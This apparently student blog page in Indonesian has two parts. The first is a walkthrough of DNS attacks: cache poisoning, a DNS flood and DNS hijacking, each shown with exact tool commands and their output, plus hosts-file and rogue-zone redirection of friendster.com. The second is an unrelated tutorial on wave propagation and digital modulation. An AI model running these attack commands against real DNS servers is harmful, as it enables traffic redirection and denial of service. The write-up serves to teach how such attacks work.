Tiga informasi yang dibutuhkan agar query dapat diterima yaitu ID transaksi, IP

sumber dan port sumber. Dengan mengetahui alamat IP sumber maka dapat diketahui

alamat server nama yang di query. Yang sulit dicari adalah port sumber. Seringkali

BIND akan menggunakan kembali port sumber yang sama untuk query dari klien

yang sama. Maka, jika penyerang bekerja dari sebuah server nama, maka dia dapat

meminta DNS untuK melihat hostname dari servernya dari server target dan saat

paket query recursif datang, maka port sumber didapatkan.

  • IMPLEMENTASI CACHE POISONING

Pada bab 4 ini, akan dibahas mengenai implementasi dari serangan cache poisoning

terhadap server DNS. Pada 4.1 merupakan implementasi serangan cache poisoning

yang saya dapatkan dari studi literatur makalah Attacking the DNS Protocol –

Security Paper v2, ESA Certification, Sainstitute.org. Pada 4.2 merupakan

implementasi serangan cache poisoning yang saya lakukan dengan cara sendiri.

Implementasi serangan-serangan ini dilakukan sebagai uji coba untuk pembelajaran.

CONTOH SERANGAN SERVER DNS

  • Cache Poisoning Pada Server DNS

Pada uji coba serangan ini, asumsikan server nama target adalah ns1.sa.com

(12.12.12.12) dan kita menginginkan untuk “meracuni” cachenya untuk mempercayai

bahwa www.microsoft.com memiliki alamat IP 10.10.10.10 dan dengan harapan

bahwa semua query yang akan datang dalam cache-nya akan terarah ke alamat

10.10.10.10. Dengan alamat server DNS dari microsoft.com adalah

ns1.microsoft.com (13.13.13.13).

Skrip pertama dari serangan ini disebut dns1.pl1 yang secara lengkap dapat dilihat dari

http://www.sainstitute.org/articles/tools/Dns1.pl . Serangan ini harus dijalankan dari

server nama autorisasi yang dikendalikan oleh penyerang untuk meng query server

nama target untuk sebuah hostname yang di autorisasi oleh mesin penyerang. Dalam

contoh ini, skrip dijalankan dari ns1.happydays.com dan penyerang meng query

server nama target untuk www.happydays.com :

dns1.pl 12.12.12.12 www.happydays.com

source port: 54532

Dengan demikian maka kita mendapatkan port sumber. Skrip kedua yang ditulis oleh

Ramon Izaguirre disebut hds0.pl2 ( http://www.sainstitute.org/articles/tools/Hds0.pl )

yang menjalankan serangan :

./hds0.pl 13.13.13.13 12.12.12.12 54532 www.microsoft.com 10.10.10.10

(ns1.friendster.com) (ns1.sa.com) (source port) (spoof targets)

Untuk mengetahui apakah serangan berhasil, maka query server nama target :

dig @12.12.12.12 www.microsoft.com

www.microsoft.com 86400 IN A 10.10.10.10

Dalam kasus diatas, www.microsoft.com dialihkan ke 10.10.10.10, maka serangan

berhasil. Jika serangan tidak berhasil dan didapatkan alamat IP yang tepat dari

www.microsoft.com, maka kita harus menunggu durasi TTL sampai selesai dalam

cache sebelum dapat dicoba lagi. Hal ini terjadi sepertinya karena domain dari

friendster.com mempunyai lebih dari satu server DNS, bahkan mungkin juga

mempunyai sebuah server ns2.microsoft.com. Penyerang tidak mengetahui server

DNS yang mana dari domain target yang akan diquery.

  • Serangan DoS Pada DNS

Untuk membuat denial of service pada sebuah server DNS, dapat digunakan skrip

dnsflood.pl3 ( http://www.sainstitute.org/articles/tools/Dnsflood.pl ). DNSflood

berkerja dengan mengirimkan ribuan request/permintaan DNS, yang menyebabkan

server menjadi sibuk dan menghasilkan respon yang menjadi melambat. Contoh

dibawah merupakan contoh dnsflood yang dijalankan dari satu mesin dan server DNS

di query dari mesin lain.

Pertama kali penyerang menjalankan skrip :

[root@fanta dns]# perl dnsflood.pl 128.1.1.100

attacked: 128.1.1.100...

Dibawah ini merupakan keluaran tcpdump dari mesin yang menyerang dengan tipe

paket DNS yang dikirm berbeda-beda, yang masing-masing memiliki port sumber

yang berbeda :

[root@fanta /root]# tcpdump -vvv -X dst port 53

tcpdump: listening on eth0

18:55:53.618983 42.95.39.205.domain > 128.1.1.100.domain: 35698+[|domain] (ttl 64,

id 1565, len 108)

0x0000 4500 006c 061d 0000 4011 a0d3 2a5f 27cd E..l....@...*_'.

0x0010 8001 0164 0035 0035 0058 f00f 8b72 0100 ...d.5.5.X...r..

0x0020 0001 0000 0000 0000 3a63 6b6c 7266 6969 ........:cklrfii

0x0030 7363 6d61 7362 scmasb

18:55:53.621071 95.10.15.152.domain > 128.1.1.100.domain: 35699+[|domain] (ttl 64,

id 1565, len 109)

0x0000 4500 006d 061d 0000 4011 845c 5f0a 0f98 E..m....@..\_...

0x0010 8001 0164 0035 0035 0059 3fbf 8b73 0100 ...d.5.5.Y?..s..

0x0020 0001 0000 0000 0000 3b63 6b6c 7266 6969 ........;cklrfii

0x0030 7363 6d61 7362 scmasb

Untuk menilai dampak dari serangan ini penyerang dari mesin lain pertama kali

membersihkan cache lokalnya dan meng-query server nama target. Membersihkan

cache lokal akan memastikan resolver mendapatkan informasi dari server dan bukan

lokal.

D:\>ipconfig /flushdns

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

D:\>nslookup

DNS request timed out.

timeout was 2 seconds.

*** Can't find server name for address 128.1.1.100: Timed out

*** Default servers are not available

Default Server: UnKnown

Address: 128.1.1.100

> ms2.sa.com

Server: UnKnown

Address: 128.1.1.100

DNS request timed out.

timeout was 2 seconds.

DNS request timed out.

timeout was 2 seconds.

*** Request to UnKnown timed-out

> ms3.sa.com

Server: UnKnown

Address: 128.1.1.100

DNS request timed out.

timeout was 2 seconds.

Name: ms3.sa.com

Address: 128.1.47.1

> exit

Penyerang kemudian menghentikan serangan dan sekali lagi dari mesin yang lain

meng-query server nama target setelah membersihkan cache.

D:\>ipconfig /flushdns

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

D:\>nslookup

Default Server: ns1.sa.com

Address: 128.1.1.100

> ms2.rhs.net

Server: ns1.sa.com

Address: 128.1.1.100

Name: ms2.sa.com

Address: 128.1.23.8

> exit

Perbedaan terlihat antara query yang didapatkan selama proses serangan dan setelah

serangan dihentikan. Hal ini membuktikan dampak serangan terhadap performa

server. Jika serangan dilakukan dari beberapa mesin, maka dampak yang dihasilkan

akan lebih besar.

DNS Man in the Middle Attacks – DNS Hijacking

Jika seorang penyerang dapat meletakkan dirinya diantara klien dan server DNS,

maka dia dapat mengambil balasan query resolusi nama ke klien dan mengirimkan

informasi alamat pemetaan yang palsu ke alamat yang salah. Tipe serangan ini

bergantung dari kondisi siapa yang lebih cepat. Jika penyerang ingin serangannya

berhasil, maka pernyerang harus membalas ke klien sebelum server yang

sesungguhnya. Penyerang dapat memperlambat server DNS primer dari klien dengan

menggunakan serangan denial of service. Diagram serangan dapat digambarkan

dibawah ini :

Gambar 4.1 Serangan DNS Man in the Middle (diambil berdasarkan Attacking the

DNS Protocol – Security Paper v2, ESA Certification, Sainstitute.org)

Diagram diatas menggambarkan:

1. Penyerang meletakkan dirinya diantara klien dan server nama.

2. Klien membuat permintaan DNS untuk resolusi www.microsoft.com.

3. Permintaan ini dicuri oleh penyerang yang membalas dengan informasi palsu.

4. Server DNS membalas dengan informasi yang benar.

Kondisi diatas merupakan kondisi “balapan”, klien akan menerima paket dari

pemenangnya.

Untuk mengeksekusi serangan ini, dapat digunakan skrip DNS Hijacker4 (dapat

dilihat di http://www.sainstitute.org/articles/tools/DNS Hijacker ) dan dijalankan pada

mesin penyerang. DNS Hijacker menggunakan tabel fabrikasi untuk menyimpan

informasi yang palsu untuk pengembalian kepada klien. Tabel dibawah ini

menunjukkan hostname ms2.sa.com yang dibentuk untuk membalas dengan alamat

10.10.10.10. Alamat sebenarnya dari ms2.sa.com seperti yang terdapat pada

administrator DNS adalah 128.1.23.8.

[root@fanta dnshijacker]# more ftable

10.10.10.10 ms2.sa.com

Selanjutnya penyerang memulai program DNS Hijacker seperti dibawah ini :

[root@fanta dnshijacker]# dnshijacker -f ftable udp src or dst port 53

[dns hijacker v1.2 ]

sniffing on: eth0

using filter: udp dst port 53 and udp src or dst port 53

fabrication table: ftable

dns activity: 128.1.4.232:1027 > 128.1.1.100:53 [ms2.sa.com = ?]

spoofing answer: 128.1.1.100:53 > 128.1.4.232:1027 [ms2.sa.com =

10.10.10.10]

Permintaan pertama untuk resolusi dari ms2.sa.com dan jawaban yang palsu

dikembalikan oleh penyerang yaitu 10.10.10.10. Dibawah ini merupakan informasi

yang diterima dari sisi klien:

[root@fanta init.d]# nslookup

Default Server: [128.1.1.100]

Address: 128.1.1.100

> ms2.sa.com

Server: [128.1.1.100]

Address: 128.1.1.100

Name: ms2.sa.com

Address: 10.10.10.10

Informasi yang tidak benar dikembalikan ke klien dan diterima. DNS hijacker

mempunyai pilihan a-d dengan semua permintaan DNS diintersep/dicuri dan dibalas

dengan informasi yang tidak benar.

  • SERANGAN SERVER DNS

Pada bagian ini, akan ditunjukkan implementasi serangn server DNS dengan cara

pribadi yaitu serangan ke DNS lokal yang hanya mempengaruhi alamat IP sendiri saja

dan juga serangan ke server DNS yang mempengaruhi semua klien yang

menggunakan server tersebut.

Melalui DNS Lokal

Cache poisoning dapat dilakukan dengan melakukan perubahan pada DNS komputer

lokal. Dengan perubahan tersebut maka serangan hanya terjadi pada alamat IP lokal

klien tersebut (alamat IP yang digunakan adalah 167.205.66.11 dengan nama LSKK-

11) dan tidak mengenai klien-klien lain. Pada implementasi ini, yang akan dilakukan

adalah merubah pemetaan alamat IP dari www.friendster.com ke alamat IP

167.205.65.5. Alamat IP www.friendster.com yang sebenarnya adalah

209.11.168.242. Langkah-langkahnya adalah :

1. Mengedit file pada C:\WINDOWS\system32\drivers\etc\hosts dengan

menambahkan 167.205.65.5 www.friendster.com.

2. Pada konfigurasi LAN setting di internet explorer, ditambahkan

*.friendster.com.

Dengan melakukan kedua langkah tersebut maka www.friendster.com tidak akan

dilewatkan ke proxy. Maka hasil yang didapatkan adalah :

Gambar 4.2 Tampilan dari 167.205.65.5

Melalui Server DNS

Pada implementasi serangan ini, serangan akan ditujukan pada server DNS. Dampak

dari serangan ini adalah klien-klien yang berada dalam domain server tersebut akan

terserang. Dalam implementasi ini akan dicoba mengalihkan www.friendster.com ke

alamat IP 167.205.65.10. Langkah-langkahnya adalah dengan membuat zona baru:

1. konfigurasi named.conf

zone "friendster.com" {

type master;

file "db.friendster";

};

2. konfigurasi db.friendster

$TTL 30d

@ IN SOA ns.friendster.com. me.frenster.com. (

2004030304 ; serial

1d ; refresh

1h ; retry

30d ; expire

1d ) ; minimum

IN NS ns.friendster.com.

$ORIGIN friendster.com.

www IN A 167.205.65.10

Hasil apabila di query adalah :

^_^ nslookup

Default Server: ns.friendster.com

Address: 167.205.66.11

> ls -d friendster.com

[ns.friendster.com]

$ORIGIN friendster.com.

@ 4w2d IN SOA ns.friendster.com. me.frenster.com. (

2004030304 ; serial

1D ; refresh

1H ; retry

4w2d ; expiry

1D ) ; minimum

4w2d IN NS ns.friendster.com.

www 4w2d IN A 167.205.65.10

@ 4w2d IN SOA ns.friendster.com. me.frenster.com. (

2004030304 ; serial

1D ; refresh

1H ; retry

4w2d ; expiry

1D ) ; minimum

Terlihat bahwa www.friendster.com teralihkan tampilannya ke alamat IP

167.205.65.10, berarti serangan berhasil.

  • KEAMANAN DNS DARI SERANGAN CACHE POISONING

Pada umumnya cache poisoning dapat dengan mudah dihadapi. Semua program DNS

mempunyai pilihan untuk mematikan atau menonaktifkan proses caching. Jika proses

caching tidak diaktifkan, menipu balasan kepada sebuah server adalah sia-sia.

Program yang paling terbaru telah mempunyai patch untuk melawan poisoning. Saat

ini, paket-paket yang diterima dengan cacatan authoritative / berkuasa diverifikasi

dahulu sebelum memasukannya ke dalam cache.


  • Security

Jika anda memasang DNS server pada komputer yang berfungsi sebagai gateway antara jaringan internal anda dengan jaringan Internet serta DNS Server anda tidak melayani request dari luar (caching only DNS atau DNS untuk jaringan lokal saja) maka anda bisa membuat named untuk melayani hanya jaringan lokal saja dengan menambah baris berikut di dalam blok options:

listen-on { 127.0.0.1; 192.168.1.100; };

Sehingga named hanya membuka port pada interface loopback (127.0.0.1) dan eth0 (192.168.1.100)

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read Comments

Propagasi gelombang dan Modulasi digital

  • pengertian

propagasi gelombang adalah perambatan gelombang pada media perambatan. Media

perambatan atau biasa juga disebut saluran transmisi gelombang dapat berupa fisik yaitu sepasang

kawat konduktor, kabel koaksial dan berupa non fisik yaitu gelombang radio atau sinar laser.


  • Macam- macam propagasi gelombang

1. Free Space loss

Dalam propagasi gelombang free space loss, diasumsikan ada satu signal langsung antara pengirim dan penerima. Propagasi gelombang free space loss hanya dapat terjadi ketika pengirim dan penerima dalam keadaan Line Of Sight (LOS). Yang dimaksud dengan kondisi LOS adalah keadaan dimana tidak ada obstacle di daerah Fressnel 1 diantara pengirim dan penerima.

kondisi LOS adalah keadaan dimana tidak ada obstacle di daerah Fressnel 1 diantara pengirim dan penerima.

Daerah fressnel 1 didefinisikan dengan formula:

R1 adalah daerah fressnel 1 (dalam m). d adalah jarak antara pengirim dan penerima (dalam Km). d1 adalah jarak antara pengirim dan penghalang (dalam Km). d2 adalah jarak antara penerima dan penghalang (dalam Km). f adalah frekuensi transmisi (dalam MHz).

Pada kondisi LOS, redaman propagasi hanya di sebabkan oleh redaman free space. Redaman free space dapat dirumuskan sebagai berikut:

2. Reflection

Pada kondisi ini, signal yang datang menuju penerima telah mengalami pantulan terhadap suatu object. Refleksi dapat terjadi jika signal mengenai obyek yang memiliki dimensi lebih besar dari panjang gelombang signal tersebut. Pantulan tersebut menyebabkan perubahan fasa dan menimbulkan delay.

3. Diffraction

Difraksi terjadi ketika signal melewati suatu obyek yang mempunyai bentuk yang tajam sehingga seolah-olah menghasilkan sumber sekunder. Contoh peristiwa difraksi adalah ketika gelombang mengenai puncak bukit atau atap rumah.

Redaman difraksi dapat diperoleh dengan mencari nilai v sesuai kondisi yang terjadi. Setelah itu, hitung nilai redaman sesuai dengan nilai v yang diperoleh.

4. Scattering

Scattering terjadi ketika signal melewati suatu obyek yang kasar atau memiliki mempunyai bentuk yang tajam. Peristiwa scattering menyebabkan dihamburkan dan terpecah-pecah menjadi beberapa signal. Hal itu menyebabkan level daya signal menjadi lebih kecil.

  • MODULASI DIGITAL

Modulasi digital merupakan proses penumpangan sinyal digital (bit stream) ke dalam sinyal carrier. Modulasi digital sebetulnya adalah proses mengubah-ubah karakteristik dan sifat gelombang pembawa (carrier) sedemikian rupa sehingga bentuk hasilnya (modulated carrier) memeiliki ciri-ciri dari bit-bit (0 atau 1) yang dikandungnya. Berarti dengan mengamati modulated carriernya, kita bisa mengetahui urutan bitnya disertai clock (timing, sinkronisasi).
Melalui proses modulasi digital sinyal-sinyal digital setiap tingkatan dapat dikirim ke penerima dengan baik. Untuk pengiriman ini dapat digunakan media transmisi fisik (logam atau optik) atau non fisik (gelombang-gelombang radio).
Pada dasarnya dikenal 3 prinsip atau sistem modulasi digital yaitu: ASK, FSK, dan PSK

1. Amplitude Shift Keying
Amplitude Shift Keying (ASK) atau pengiriman sinyal berdasarkan pergeseran amplitude, merupakan suatu metoda modulasi dengan mengubah-ubah amplitude. Dalam proses modulasi ini kemunculan frekuensi gelombang pembawa tergantung pada ada atau tidak adanya sinyal informasi digital.
Keuntungan yang diperoleh dari metode ini adalah bit per baud (kecepatan digital) lebih besar. Sedangkan kesulitannya adalah dalam menentukan level acuan yang dimilikinya, yakni setiap sinyal yang diteruskan melalui saluran transmisi jarak jauh selalu dipengaruhi oleh redaman dan distorsi lainnya. Oleh sebab itu meoda ASK hanya menguntungkan bila dipakai untuk hubungan jarak dekat saja.
Dalam hal ini faktor derau harus diperhitungkan dengan teliti, seperti juga pada sistem modulasi AM. Derau menindih puncak bentuk-bentuk gelombang yang berlevel banyak dan membuat mereka sukar mendeteksi dengan tepat menjadi level ambangnya.

2. Frequncy Shift Keying
Frequency Shift Keying (FSK) atau pengiriman sinyal melalui penggeseran frekuensi. Metoda ini merupakan suatu bentuk modulasi yang memungkinkan gelombang modulasi menggeser frekuensi output gelombang pembawa. Pergeseran ini terjadi antara harga-harga yang telah ditentukan semula dengan gelombang output ang tidak mempunyai fasa terputus-putus.
Dalam proses modulasi ini besarnya frekuensi gelombang pembawa berubah-ubah sesuai dengan perubahan ada atau tidak adanya sinyal informasi digital.
FSK merupakan metode modulasi yang paling populer. Dalam proses ini gelombang pembawa digeser ke atas dan ke bawah untuk memperoleh bit 1 dan bit 0. Kondisi ini masing-masing disebut space dan mark. Keduanya merupakan standar transmisi data yang sesuai dengan rekomendasi CCITT.
FSK juga tidak tergantung pada teknik on-off pemancar, seperti yang telah ditentukan sejak semula. Kehadiran gelombang pembawa dideteksi untuk menunjukkan bahwa pemancar telah siap.
Dalam hal penggunaan banyak pemancar (multi transmitter), masing-masingnya dapat dikenal dengan frekuensinya. Prinsip pendeteksian gelombang pembawa umumnya dipakai untuk mendeteksi kegagalan sistem bekerja.
Bentuk dari modulated Carrier FSK mirip dengan hasil modulasi FM. Secara konsep, modulasi FSK adalah modulasi FM, hanya disini tidak ada bermacam-macam variasi /deviasi ataupun frekuensi, yang ada hanya 2 kemungkinan saja, yaitu More atau Less (High atau Low, Mark atau Space). Tentunya untuk deteksi (pengambilan kembali dari kandungan Carrier atau proses demodulasinya) akan lebih mudah, kemungkinan kesalahan (error rate) sangat minim/kecil.
Umumnya tipe modulasi FSK dipergunakan untuk komunikasi data dengan Bit Rate (kecepatan transmisi) yang relative rendah, seperti untuk Telex dan Modem-Data dengan bit rate yang tidak lebih dari 2400 bps (2.4 kbps).

3. Phase Shift Keying
Phase Shift Keying (PSK) atau pengiriman sinyal melalui pergeseran fasa. Metoda ini merupakan suatu bentuk modulasi fasa yang memungkinkan fungsi pemodulasi fasa gelombang termodulasi di antara nilai-nilai diskrit yang telah ditetapkan sebelumnya. Dalam proses modulasi ini fasa dari frekuensi gelombang pembawa berubah-ubah sesuai denganperubahan status sinyal informasi digital.
Sudut fasa harus mempunyai acuan kepada pemancar dan penerima. Akibatnya, sangat diperlukan stabilitas frekuensi pada pesawat penerima.
Guna memudahkan untuk memperoleh stabilitas pada penerima, kadang-kadang dipakai suatu teknik yang koheren dengan PSK yang berbeda-beda. Hubungan antara dua sudut fasa yang dikirim digunakan untuk memelihara stabilitas. Dalam keadaan seperti ini , fasa yang ada dapat dideteksi bila fasa sebelumnya telah diketahui. Hasil dari perbandingan ini dipakai sebagai patokan (referensi).
Untuk transmisi Data atau sinyal Digital dengan kecepatan tinggi, lebih efisien dipilih system modulasi PSK. Dua jenis modulasi PSK yang sering kita jumpai yaitu :

3.1. BPSK
BPSK adalah format yang paling sederhana dari PSK. Menggunakan dua yang tahap yang dipisahkan sebesar 180° dan sering juga disebut 2-PSK. Modulasi ini paling sempurna dari semua bentuk modulasi PSK. Akan tetapi bentuk modulasi ini hanya mampu memodulasi 1 bit/simbol dan dengan demikian maka modulasi ini tidak cocok untuk aplikasi data-rate yang tinggi dimana bandwidthnya dibatasi.

3.2. QPSK
Kadang-Kadang dikenal sebagai quarternary atau quadriphase PSK atau 4-PSK, QPSK menggunakan empat titik pada diagram konstilasi, terletak di sekitar suatu lingkaran. Dengan empat tahap, QPSK dapat mendekode dua bit per simbol. Hal ini berarti dua kali dari BPSK. Analisa menunjukkan bahwa ini mungkin digunakan untuk menggandakan data rate jika dibandingkan dengan sistem BPSK. Walaupun QPSK dapat dipandang sebagai sebagai suatu modulasi quaternary, lebih mudah untuk melihatnya sebagai dua quadrature carriers yang termodulasi tersendiri. Dengan penafsiran ini, maka bit yang digunakan untuk mengatur komponen phase pada sinyal carrier ketika digunakan untuk mengatur komponen quadrature-phase dari sinyal carrier tersebut. BPSK digunakan pada kedua carrier dan dapat dimodulasi dengan bebas.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read Comments